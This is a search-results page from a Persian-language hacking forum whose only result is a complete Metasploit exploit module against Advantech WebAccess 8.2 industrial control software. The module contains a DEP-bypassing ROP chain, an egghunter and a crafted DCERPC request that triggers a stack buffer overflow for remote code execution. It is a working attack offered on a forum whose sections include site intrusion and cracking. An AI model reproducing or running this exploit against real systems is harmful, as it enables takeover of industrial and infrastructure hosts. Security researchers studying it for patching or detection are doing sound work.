امکانات انجمن
 • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های '8.2-2017.03.31'.تنظیمات بیشتر جستجو

 • جستجو بر اساس برچسب

  برچسب ها را با , از یکدیگر جدا نمایید.
 • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

 • انجمن های اصلی تیم
  • قوانین و اساسنامه ی انجمن
  • آخرین خبرها
  • اطلاعیه ها
  • مدیران
  • دوره های آموزشی
  • انتقادات پیشنهادات
 • آموزش های تخصصی
  • برنامه نویسی
  • هکینگ
  • امنیت
  • شبکه
  • سخت افزار
  • متفرقه
 • پرسش و پاسخ (FAQ)
  • سوالات و مشکلات پیرامون برنامه نویسی
  • سوالات و مشکلات پیرامون هکینگ
  • سوالات و مشکلات پیرامون امنیت
  • سوالات و مشکلات پیرامون شبکه
  • سوالات و مشکلات پیرامون سخت افزار
  • سوالات و مشکلات پیرامون سیستم عامل
  • سوالات و درخواست های متفرقه
 • سیستم عامل
  • ویندوز
  • لینوکس
  • کالی لینوکس
  • اندروید
  • اپل
 • بخش ویژه (مخصوص اعضای ویژه)
  • هکینگ
  • امنیت
  • شبکه
  • متفرقه
 • پروژه های تیم
  • پروژه های نفوذ به سایت
  • پروژه های ساخت نرم افزار
  • پروژه های آسیب پذیری
  • پروژه های ساخت سایت
 • مسابقات
  • مسابقات امنیت و هکینگ
  • مسابقات برنامه نویسی
  • مسابقات کرکینگ
 • عمومی
  • توسعه دهندگان
  • ترفند های متفرقه
  • گرافیک
  • ربات تلگرام
 • بحث آزاد علمی
  • عمران و معماری
  • الکتروتکنیک
  • کتابخانه سراسری
 • بخش دریافت
  • دانلود نرم افزار
 • آرشیو
  • بایگانی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

 • شروع

  پایان


آخرین به روز رسانی

 • شروع

  پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

 • شروع

  پایان


گروه


درباره من


جنسیت


محل سکونت

1 نتیجه پیدا شد

 1. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Egghunter def initialize(info = {}) super(update_info(info, 'Name' => 'Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Advantech WebAccess 8.2. By sending a specially crafted DCERPC request, an attacker could overflow the buffer and execute arbitrary code. }, 'Author' => [ 'mr_me <mr_me[at]offensive-security[dot]com>' ], 'License' => MSF_LICENSE, 'References' => [ [ 'ZDI', '17-938' ], [ 'CVE', '2017-14016' ], [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02' ] ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 2048, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31', { 'Ret' => 0x07036cdc, # pop ebx; add esp, 994; retn 0x14 'Slide' => 0x07048f5b, # retn 'Jmp' => 0x0706067e # pop ecx; pop ecx; ret 0x04 } ], ], 'DisclosureDate' => 'Nov 02 2017', 'DefaultTarget' => 0)) register_options([ Opt::RPORT(4592)]) end def create_rop_chain() # this target opts into dep rop_gadgets = [ 0x020214c6, # POP EAX # RETN [BwKrlAPI.dll] 0x0203a134, # ptr to &VirtualAlloc() [IAT BwKrlAPI.dll] 0x02032fb4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [BwKrlAPI.dll] 0x070738ee, # XCHG EAX,ESI # RETN [BwPAlarm.dll] 0x0201a646, # POP EBP # RETN [BwKrlAPI.dll] 0x07024822, # & push esp # ret [BwPAlarm.dll] 0x070442dd, # POP EAX # RETN [BwPAlarm.dll] 0xffffffff, # Value to negate, will become 0x00000001 0x070467d2, # NEG EAX # RETN [BwPAlarm.dll] 0x0704de61, # PUSH EAX # ADD ESP,0C # POP EBX # RETN [BwPAlarm.dll] rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), 0x02030af7, # POP EAX # RETN [BwKrlAPI.dll] 0xfbdbcbd5, # put delta into eax (-> put 0x00001000 into edx) 0x02029003, # ADD EAX,424442B # RETN [BwKrlAPI.dll] 0x0201234a, # XCHG EAX,EDX # RETN [BwKrlAPI.dll] 0x07078df5, # POP EAX # RETN [BwPAlarm.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x070467d2, # NEG EAX # RETN [BwPAlarm.dll] 0x07011e60, # PUSH EAX # ADD AL,5B # POP ECX # RETN 0x08 [BwPAlarm.dll] 0x0706fe66, # POP EDI # RETN [BwPAlarm.dll] rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), 0x0703d825, # RETN (ROP NOP) [BwPAlarm.dll] 0x0202ca65, # POP EAX # RETN [BwKrlAPI.dll] 0x90909090, # nop 0x07048f5a, # PUSHAD # RETN [BwPAlarm.dll] ].flatten.pack("V*") return rop_gadgets end def exploit connect handle = dcerpc_handle('5d2b62aa-ee0a-4a95-91ae-b064fdb471fc', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") # send the request to get the handle resp = dcerpc.call(0x4, [0x02000000].pack('V')) handle = resp.last(4).unpack('V').first print_good("Got a handle: 0x%08x" % handle) egg_options = { :eggtag => "0day" } egghunter, egg = generate_egghunter(payload.encoded, payload_badchars, egg_options) # apparently this is called a ret chain overflow = [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Jmp']].pack('V') overflow << [target['Ret']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << create_rop_chain() overflow << egghunter overflow << egg overflow << rand_text_alpha(0x1000-overflow.length) # sorry but I dont like msf's ndr class. sploit = [handle].pack('V') sploit << [0x000138bd].pack('V') # opcode we are attacking sploit << [0x00001000].pack('V') # size to copy sploit << [0x00001000].pack('V') # size of string sploit << overflow print_status("Trying target #{target.name}...") begin dcerpc_call(0x1, sploit) rescue Rex::Proto::DCERPC::Exceptions::NoResponse ensure disconnect end handler end end